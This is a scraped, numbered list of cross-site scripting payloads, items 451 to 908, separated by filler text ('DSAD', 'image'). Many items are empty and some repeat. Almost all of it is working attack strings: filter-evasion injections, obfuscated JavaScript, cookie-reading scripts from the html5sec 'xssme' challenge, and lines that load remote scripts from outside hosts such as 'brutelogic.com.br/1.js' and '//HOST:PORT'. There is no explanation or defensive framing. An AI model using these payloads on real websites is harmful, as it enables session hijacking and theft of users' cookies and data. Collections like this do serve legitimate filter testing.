    DSAD

  451. image <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>

    DSAD

  452. image <iframe onload="write('<script>'+location.hash.substr(1)+'</script>')"></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

    DSAD

  453. image <script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src="javascript:parent.x(window)"><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

    DSAD

  454. image <textarea id=ta onfocus="write('<script>alert(1)</script>')" autofocus></textarea>

    DSAD

  455. image <object data="data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=">

    DSAD

  456. image <script>function x(window) { eval(location.hash.substr(1)) }; open("javascript:opener.x(window)")</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

    DSAD

  457. image <script>xhr=new ActiveXObject("Msxml2.XMLHTTP");xhr.open("GET","/xssme2",true);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){alert(xhr.responseText.match(/'([^']+)/)[1])}};xhr.send();</script>

    DSAD

  458. image <iframe src=`http://xssme.html5sec.org/?xss=<iframe onload="xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){alert(xhr.responseText.match(/'([^']+)/)[1])}};xhr.send();">`>

    DSAD

  459. image <a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ+ name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>

    DSAD

  460. image <a target="x" href="xssme?xss=<script>addEventListener("DOMFrameContentLoaded", function(e) {e.stopPropagation();}, true);</script><iframe src="data:text/html,%3cscript%3eObject.defineProperty(top, 'MyEvent', {value: Object, configurable: true});function y() {alert(top.Safe.get());};event = new Object();event.type = 'click';event.isTrusted = true;y(event);%3c/script%3e"></iframe>

    DSAD

  461. image <a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>

    DSAD

  462. image <a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src="javascript:parent.x(window);"></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

    DSAD

  463. image Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>

    DSAD

  464. image <a href="javascript:\u0061l&#101rt(1)"><button>

    DSAD

  465. image <div onmouseover='alert(1)'>DIV</div>

    DSAD

  466. image <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">

    DSAD

  467. image <a href="jAvAsCrIpT:alert(1)">X</a>

    DSAD

  468. image <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ?

    DSAD

  469. image <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?

    DSAD

  470. image <var onmouseover="prompt(1)">On Mouse Over</var>?

    DSAD

  471. image <a href=javascript:alert(document.cookie)>Click Here</a>

    DSAD

  472. image <img src="/" =_=" title="onerror='prompt(1)'">

    DSAD

  473. image <%<!--'%><script>alert(1);</script -->

    DSAD

  474. image <script src="data:text/javascript,alert(1)"></script>

    DSAD

  478. image <input type="text" value=``<div/onmouseover='alert(1)'>X</div>

    DSAD

  479. image <input value=<><iframe/src=javascript:confirm(1)

    DSAD

  480. image <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															(
																1
																	)></iframe> ?

    DSAD

  484. image <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	(	1	)></iframe>

    DSAD

  485. image <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>

    DSAD

  486. image <meta http-equiv="refresh" content="0;javascript:alert(1)"/>?

    DSAD

  487. image <math><a xlink:href="//jsfiddle.net/t846h/">click

    DSAD

  488. image <svg contentScriptType=text/vbs><script>MsgBox+1

    DSAD

  489. image <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>

    DSAD

  490. image <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?

    DSAD

  491. image <a href="data:text/html;base64_,<svg/onload=\u0061l&#101rt(1)>">X</a

    DSAD

  492. image <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+

    DSAD

  493. image <script/src="data:text/j\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=/

    DSAD

  494. image <script/src=data:text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061lert(/XSS/)></script ????????????

    DSAD

  495. image <object data=javascript:\u0061l&#101rt(1)>

    DSAD

  496. DSAD

  497. image <script itworksinallbrowsers>/*<script* */alert(1)</script ?

    DSAD

  499. image <svg><script>//
confirm(1);</script </svg>

    DSAD

  500. image <svg><script onlypossibleinopera:-)> alert(1)

    DSAD

  501. image <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

    DSAD

  503. image <div/onmouseover='alert(1)'> style="x:">

    DSAD

  504. image <--`<img/src=` onerror=alert(1)> --!>

    DSAD

  505. image <body/onload=<!-->&#10alert(1)>

    DSAD

  506. image <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(1)></script> ?

    DSAD

  507. image <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?

    DSAD

  508. image "><img src=x onerror=window.open('https://www.google.com/');>

    DSAD

  509. image <form><button formaction=javascript:alert(1)>CLICKME

    DSAD

  510. image <math><a xlink:href="//jsfiddle.net/t846h/">click

    DSAD

  511. image <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?

    DSAD

  512. image <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

    DSAD

  513. DSAD

  514. image <iframe src="data:text/html,<script>alert(1)</script>"></iframe>

    DSAD

  588. image innerHTML=location.hash>#<script>alert(1)</script>

    DSAD

  596. DSAD

  606. DSAD

  607. DSAD

  641. image <svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>

    DSAD

  643. DSAD

  645. image */alert(1)">'onload="/*<svg/1='

    DSAD

  646. DSAD

  647. DSAD

  653. image <math><brute href=javascript:alert(1)>click

    DSAD

  654. image <form action=javascript:alert(1)><input type=submit>

    DSAD

  655. image <isindex action=javascript:alert(1) type=submit value=click>

    DSAD

  656. image <form><button formaction=javascript:alert(1)>click

    DSAD

  657. image <form><input formaction=javascript:alert(1) type=submit value=click>

    DSAD

  658. image <form><input formaction=javascript:alert(1) type=image value=click>

    DSAD

  659. image <form><input formaction=javascript:alert(1) type=image src=SOURCE>

    DSAD

  660. image <isindex formaction=javascript:alert(1) type=submit value=click>

    DSAD

  662. image <iframe srcdoc=<svg/o&#x6Eload=alert(1)>>

    DSAD

  663. image <svg><script xlink:href=data:,alert(1) />

    DSAD

  664. image <math><brute xlink:href=javascript:alert(1)>click

    DSAD

  665. image <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>

    DSAD

  671. image "><img src=1 onerror=alert(1)>.gif

    DSAD

  672. image <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

    DSAD

  674. image GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;

    DSAD

  675. image "><script src=data:,alert(1)//

    DSAD

  676. image <script src="//brutelogic.com.br/1.js#

    DSAD

  677. image "><script src=//brutelogic.com.br/1.js#

    DSAD

  678. image <link rel=import href="data:text/html,<script>alert(1)</script>

    DSAD

  679. image "><link rel=import href=data:text/html,<script>alert(1)</script>

    DSAD

  681. image <script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1)

    DSAD

  685. image <body onhashchange=alert(1)><a href=#x>click this!#x

    DSAD

  686. image <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x

    DSAD

  687. image <body onscroll=alert(1)><br><br><br><br>

    DSAD

  693. image <video onloadstart=alert(1)><source>

    DSAD

  696. image <form onsubmit=alert(1)><input type=submit>

    DSAD

  697. image <select onchange=alert(1)><option>1<option>2

    DSAD

  698. DSAD

  700. image <scr<script>ipt>alert('XSS')</scr<script>ipt>

    DSAD

  701. image "><script>alert('XSS')</script>

    DSAD

  702. image "><script>alert(String.fromCharCode(88,83,83))</script>

    DSAD

  704. image <img src=x onerror=alert(String.fromCharCode(88,83,83));>

    DSAD

  705. image <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>

    DSAD

  707. image "><img src=x onerror=alert('XSS');>

    DSAD

  708. image "><img src=x onerror=alert(String.fromCharCode(88,83,83));>

    DSAD

  713. image "><svg/onload=alert(String.fromCharCode(88,83,83))>

    DSAD

  721. image <video><source onerror="javascript:alert(1)">

    DSAD

  722. image <video src=_ onloadstart="alert(1)">

    DSAD

  723. image <details/open/ontoggle="alert`1`">

    DSAD

  726. image <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

    DSAD

  727. image <meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>

    DSAD

  728. image data:text/html,<script>alert(0)</script>

    DSAD

  730. image jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )// //</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

    DSAD

  731. image ">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id)>'"><img src="http: //i.imgur.com/P8mL8.jpg">

    DSAD

  732. image " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//

    DSAD

  733. image ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

    DSAD

  734. image javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*

    DSAD

  735. image javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a

    DSAD

  736. image javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/

    DSAD

  737. image javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*

    DSAD

  738. image javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*

    DSAD

  739. image javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*

    DSAD

  740. image javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//

    DSAD

  741. image --></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*

    DSAD

  742. image /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*

    DSAD

  743. image javascript://--></title></style></textarea></script><svg "//' onclick=alert()//

    DSAD

  744. image /</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*

    DSAD

  747. image <script>window['alert'](document['domain'])<script>

    DSAD

  749. image <script>window['alert'](0)</script>

    DSAD

  750. image <script>parent['alert'](1)</script>

    DSAD

  751. DSAD

  758. DSAD

  760. DSAD

  769. DSAD

  770. DSAD

  804. image <svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>

    DSAD

  806. DSAD

  808. image */alert(1)">'onload="/*<svg/1='

    DSAD

  809. DSAD

  810. DSAD

  816. image <math><brute href=javascript:alert(1)>click

    DSAD

  817. image <form action=javascript:alert(1)><input type=submit>

    DSAD

  818. image <isindex action=javascript:alert(1) type=submit value=click>

    DSAD

  819. image <form><button formaction=javascript:alert(1)>click

    DSAD

  820. image <form><input formaction=javascript:alert(1) type=submit value=click>

    DSAD

  821. image <form><input formaction=javascript:alert(1) type=image value=click>

    DSAD

  822. image <form><input formaction=javascript:alert(1) type=image src=SOURCE>

    DSAD

  823. image <isindex formaction=javascript:alert(1) type=submit value=click>

    DSAD

  825. image <iframe srcdoc=<svg/o&#x6Eload=alert(1)>>

    DSAD

  826. image <svg><script xlink:href=data:,alert(1) />

    DSAD

  827. image <math><brute xlink:href=javascript:alert(1)>click

    DSAD

  828. image <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>

    DSAD

  834. image "><img src=1 onerror=alert(1)>.gif

    DSAD

  835. image <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

    DSAD

  836. image GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;

    DSAD

  838. image "><script src=data:,alert(1)//

    DSAD

  839. image <script src="//brutelogic.com.br/1.js#

    DSAD

  840. image "><script src=//brutelogic.com.br/1.js#

    DSAD

  841. image <link rel=import href="data:text/html,<script>alert(1)</script>

    DSAD

  842. image "><link rel=import href=data:text/html,<script>alert(1)</script>

    DSAD

  845. image <script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1)

    DSAD

  848. image <body onhashchange=alert(1)><a href=#x>click this!#x

    DSAD

  849. image <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x

    DSAD

  850. image <body onscroll=alert(1)><br><br><br><br>

    DSAD

  856. image <video onloadstart=alert(1)><source>

    DSAD

  859. image <form onsubmit=alert(1)><input type=submit>

    DSAD

  860. image <select onchange=alert(1)><option>1<option>2

    DSAD

  861. DSAD

  862. image <script>\u0061\u006C\u0065\u0072\u0074(1)</script>

    DSAD

  863. image <img src="1" onerror="alert(1)" />

    DSAD

  864. image <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>

    DSAD

  865. image <iframe src="javascript:alert(1)"></iframe>

    DSAD

  866. image <script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>

    DSAD

  867. DSAD

  869. image <script ~~~>confirm(1)</script ~~~>

    DSAD

  870. DSAD

  871. image <</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>

    DSAD

  872. image <</script/script><script ~~~>\u0061lert(1)</script ~~~>

    DSAD

  873. image </style></scRipt><scRipt>alert(1)</scRipt>

    DSAD

  874. image <img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>

    DSAD

  875. image <img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>

    DSAD

  876. image <svg><x><script>alert('1'&#41</x>

    DSAD

  877. image <iframe src=""/srcdoc='<svg onload=alert(1)>'>

    DSAD

  878. image '"--></style></script><script>shadowlabs(0x000045)</script>

    DSAD

  879. image <<scr\0ipt/src=http://xss.com/xss.js></script

    DSAD

  880. image '"--></style></script><script>RWAR(0x00010E)</script>

    DSAD

  882. image "><iframe src="http://google.com"% 3E

    DSAD

  883. image '<script>window.onload=function(){document.forms[0].message.value='1';}</script>

    DSAD

  884. image x”</title><img src=x onerror=alert(1)>

    DSAD

  885. image <script> document.getElementById("safe123").setCapture(); document.getElementById("safe123").click(); </script>

    DSAD

  886. image <script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>

    DSAD

  887. image <script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>

    DSAD

  888. image <script>(function() {var event = document.createEvent("MouseEvents");event.initMouseEvent("click", true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>

    DSAD

  889. image <script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>

    DSAD

  890. image <script>xhr=new ActiveXObject("Msxml2.XMLHTTP");xhr.open("GET","/xssme2",true);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){alert(xhr.responseText.match(/'([^']+)/)[1])}};xhr.send();</script>

    DSAD

  891. image <script>alert(document.documentElement.innerHTML.match(/'([^']+)/)[1])</script>

    DSAD

  892. image <script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']+)/)[1])</script>

    DSAD

  893. image <script> d = document.createElement("div"); d.appendChild(document.head.cloneNode(true)); alert(d.innerHTML.match("cookie = '(.*?)'")[1]); </script>

    DSAD

  894. image <script> var xdr = new ActiveXObject("Microsoft.XMLHTTP"); xdr.open("get", "/xssme2?a=1", true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*?)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>

    DSAD

  895. image <iframe id="ifra" src="/"></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write("<scr" + "ipt>top.foo = Object.defineProperty</scr" + "ipt>"); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script>

    DSAD

  896. image <script>alert(document.head.innerHTML.substr(146,20));</script>

    DSAD

  897. image <script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>

    DSAD

  898. image <script>alert(document.head.childNodes[3].text)</script>

    DSAD

  899. image <script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>

    DSAD

  900. image <script>x=document.createElement("iframe");x.src="http://xssme.html5sec.org/404";x.onload=function(){window.frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")};document.body.appendChild(x);</script>

    DSAD

  901. image <script>x=document.createElement("iframe");x.src="http://xssme.html5sec.org/404";x.onload=function(){window.frames[0].document.write("<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>")};document.body.appendChild(x);</script>

    DSAD

  902. image <script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' + x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script>

    DSAD

  903. image <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie\s+=\s+'(.*)'/gi); alert(RegExp.$1); } } xmlHttp.send(null); }; </script>

    DSAD

  904. image <script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById("safe123").click=function()+{alert(Safe.get());} document.getElementById("safe123").click(test); </script>

    DSAD

  905. image <script> document.getElementById("safe123").click=function()+{alert(Safe.get());} document.getElementById("safe123").click({'type':'click','isTrusted':true}); </script>

    DSAD

  906. image <iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%3Dnew%20this.contentWindow.window.XMLHttpRequest%28%29%3Bfff.open%28%22GET%22%2C%22xssme2%22%29%3Bfff.onreadystatechange%3Dfunction%28%29%7Bif%20%28fff.readyState%3D%3D4%20%26%26%20fff.status%3D%3D200%29%7Balert%28fff.responseText%29%3B%7D%7D%3Bfff.send%28%29%3B></iframe>

    DSAD

  907. image <script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>

    DSAD

  908. image <img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #

    DSAD

